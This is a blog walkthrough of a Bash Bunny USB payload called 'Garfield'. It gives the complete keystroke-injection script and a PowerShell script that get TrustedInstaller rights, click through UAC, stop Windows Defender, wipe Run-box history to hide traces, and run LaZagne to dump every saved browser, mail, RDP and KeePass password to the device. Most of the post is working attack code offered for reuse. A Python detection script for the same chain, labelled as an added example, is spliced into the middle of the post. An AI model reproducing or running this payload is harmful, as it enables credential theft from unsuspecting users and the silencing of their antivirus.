Bash Bunny Payload: Garfield steals passwords with LaZagne

The Bash Bunny is a USB attack platform developed by Hak5, a security research group. It’s a device that looks like a USB memory stick, except it is a small computer running a Debian-based Linux OS with a desktop-class SSD and a quad-core ARM processor. It can be configured to present itself as a HID (Human Interface Device), a storage device, a serial device or a USB network adaptor in order to carry out automated tasks on a computer. For more information, I wrote a Bash Bunny Primer article here.

My most recent payload I’ve named Garfield because it uses a tool called LaZagne to ‘backup’ passwords from common programs in a Windows installation. LaZagne is flagged by Windows Defender (and probably other AV) as malware, so my payload disables Windows Defender before running the tool. Below, I walk through the payload and explain my process.

There are a few prerequisites: the current user must be in the Administrators group, and Windows Defender must be the real-time AV product running, though this script could easily be adapted for other antivirus products.

This payload uses the following tools:

You can find all my Bash Bunny payloads on GitHub.

######## ATTACK ########
ATTACKMODE HID STORAGE
LED ATTACK
RUN WIN "PowerShell.exe -noe -c ". mode.com con: lines=1 cols=12""
sleep 2
Q STRING "\$src1 = (gwmi win32_volume -f 'label=''BashBunny''').Name+'bin\runasti64 powershell'"
Q ENTER
sleep 1

The primary commands here are RUN WIN, which uses the Windows Run box to open a PowerShell session, and the queued string that builds the path to the RunAsTI64 tool, which is then used to open a PowerShell session as TrustedInstaller.

Windows Defender on the latest versions of Windows 10 cannot be disabled by a regular user or administrator. It can only be disabled by a user running with TrustedInstaller privileges.

Fun fact: TI privileges were first introduced with Windows Vista.

Q STRING "powershell -ep bypass \$src1"
Q ENTER
sleep 5
Q ALT Y
sleep 2

PowerShell runs the RunAsTI64 tool and opens an elevated PowerShell session. This causes UAC to pop up, so the sleep 5 waits long enough for the UAC prompt to appear. Sending ALT Y answers "Yes" to the prompt.

Q STRING "net stop windefend | Out-Null"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER
sleep 2

In the elevated PowerShell session, we disable Windows Defender by simply stopping the service, and then we close the PowerShell window to give focus back to the previous session.

I’ve tried other ways of disabling Windows Defender, but this way ended up being the fastest and most straightforward.

Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\g.ps1'"
Q ENTER
sleep 1
Q STRING "powershell -ep bypass \$src"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER

Finally, we run the PowerShell script that runs LaZagne and then exit the PowerShell session.

The entire process takes around 10 seconds to run.

Below I’ll walk through the PowerShell script.

# Vars for log
$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
$ToolPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'bin')
$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\Garfield')
$dest = "$destPath\$destFile"

Here we set the variables for the paths to the tool and the log.

Since this is running from the Bash Bunny’s storage and we don’t know which drive letter Windows will assign it, we use WMI to query for the volume labelled ‘BashBunny’ and read its drive letter.

# Clear Run history
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue

Now we remove the history of the Windows run box, cleaning up our tracks behind us.

# Get passwords
& $ToolPath\lazagne.exe all | Out-File -FilePath $dest -Encoding ASCII

Add-Content -Path $dest -Value ""
Add-Content -Path $dest -Value "Have a nice day ;)"

Finally, we run the LaZagne tool and dump all the passwords it finds to the log file.
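As an added example (not part of the original post, and not code from Hak5 or LaZagne), here is the defender's counterpart to the payload walkthrough and the PowerShell script above: detection logic that classifies exported Windows event records for each step the post describes (the WinDefend service stop, the RunMRU wipe and the LaZagne execution) and flags hosts where two or more of those signals land within a short window. The record layout, channel names and sample events are constructed assumptions shaped like a JSON export of the System and Sysmon logs, not a real export schema.

```python
from collections import namedtuple
from datetime import datetime, timedelta
from typing import Dict, List, Optional

Event = namedtuple("Event", "host ts channel event_id data")  # exported record; field names are assumptions

def classify(ev: Event) -> Optional[str]:
    """Map one record to a signal from the walkthrough above, or None."""
    d = ev.data
    # System 7036 (Service Control Manager): a service changed state
    if ev.channel == "System" and ev.event_id == 7036:
        if "Defender" in d.get("param1", "") and d.get("param2") == "stopped":
            return "defender_service_stopped"
    # Sysmon 1 (process creation): the 'net stop windefend' and LaZagne steps
    if ev.channel == "Sysmon" and ev.event_id == 1:
        cmd = d.get("CommandLine", "").lower()
        if "stop" in cmd and "windefend" in cmd:
            return "defender_stop_command"
        if d.get("Image", "").lower().endswith("lazagne.exe"):
            return "credential_dumper_run"
    # Sysmon 12 (registry object deleted): the RunMRU clean-up step
    if ev.channel == "Sysmon" and ev.event_id == 12:
        if d.get("EventType") == "DeleteValue" and "runmru" in d.get("TargetObject", "").lower():
            return "run_history_wiped"
    return None

def correlate(events: List[Event], window=timedelta(seconds=60)) -> Dict[str, List[str]]:
    """Hosts where two or more distinct signals fall inside `window`, and which ones."""
    per_host: Dict[str, list] = {}
    for ev in events:
        sig = classify(ev)
        if sig:
            per_host.setdefault(ev.host, []).append((ev.ts, sig))
    hits: Dict[str, set] = {}
    for host, tagged in per_host.items():
        for t0, _ in tagged:
            sigs = {s for t, s in tagged if timedelta(0) <= t - t0 <= window}
            if len(sigs) >= 2:
                hits.setdefault(host, set()).update(sigs)
    return {h: sorted(s) for h, s in hits.items()}

# Constructed sample export: one host showing the chain, benign service noise on another
T = datetime(2020, 1, 1, 12, 0, 0)
SAMPLE = [
    Event("WS01", T, "Sysmon", 1, {"Image": r"C:\Windows\System32\net.exe", "CommandLine": "net stop windefend"}),
    Event("WS01", T + timedelta(seconds=1), "System", 7036, {"param1": "Windows Defender Antivirus Service", "param2": "stopped"}),
    Event("WS01", T + timedelta(seconds=4), "Sysmon", 12, {"EventType": "DeleteValue", "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"}),
    Event("WS01", T + timedelta(seconds=5), "Sysmon", 1, {"Image": r"E:\bin\lazagne.exe", "CommandLine": "lazagne.exe all"}),
    Event("WS02", T, "System", 7036, {"param1": "Print Spooler", "param2": "stopped"}),
]
```

Running `correlate(SAMPLE)` reports WS01 with all four signals and nothing for WS02, whose lone service stop is ordinary noise; a single signal on its own never raises a hit.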

We could use the RunAsTI tool again to restart the Windows Defender service for maximum cleanup and to hide our tracks further. I opted to leave it out of this payload so the process runs more quickly.

The list of programs that LaZagne can recover passwords from is impressive; the main ones are Firefox, Chrome, Internet Explorer, Outlook, RDP Manager, PuTTY, KeePass and many more. The full list is available on LaZagne’s documentation page.

I hope this article is useful to you. If you want to get in touch with me please feel free to use the comments, Twitter or my contact form.

Please consider supporting my work: monthly on patreon, or by buying me a coffee with paypal, or ko-fi.

-Mike
